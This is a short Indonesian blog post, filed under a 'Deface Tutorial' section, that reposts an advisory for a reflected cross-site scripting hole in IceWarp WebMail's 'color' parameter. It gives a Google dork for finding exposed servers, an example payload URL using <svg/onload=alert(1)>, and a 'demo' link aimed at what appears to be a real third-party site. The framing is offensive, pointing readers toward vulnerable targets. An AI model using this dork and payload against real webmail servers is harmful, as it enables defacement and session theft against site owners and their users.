banner here
Home Deface Tutorial IceWarp WebMail Cross-Site Scripting Vulnerability

IceWarp WebMail Cross-Site Scripting Vulnerability

- Februari 06, 2020
advertise here

[+] Date: 2020/01/27 [+] Author: Lutfu Mert Ceylan [+] Vendor Homepage: www.icewarp.com [+] Tested on: Windows 7 [+] Versions: 11.4.4.1 and before [+] Vulnerable Parameter: "color" (Get Method) [+] Vulnerable File: /webmail/ [+} Dork : inurl:/webmail/ intext:Powered by IceWarp Server

Example : https://target.com/webmail/ atau https://target.com:32000/webmail/
Example Vuln url : https://target.com/webmail/?color="><svg/onload=alert(1)>
Payload : <svg/onload=alert(1)> atau cari disini


Demo : https://hchra.org:32001/webmail/?color="><svg/onload=alert('lawsec')>

Sumber : https://cxsecurity.com/issue/WLB-2020010211
Advertisement advertise here
advertise here
This is newest post IceWarp WebMail Cross-Site Scripting Vulnerability
Previous article Previous Post
Langganan: Posting Komentar (Atom)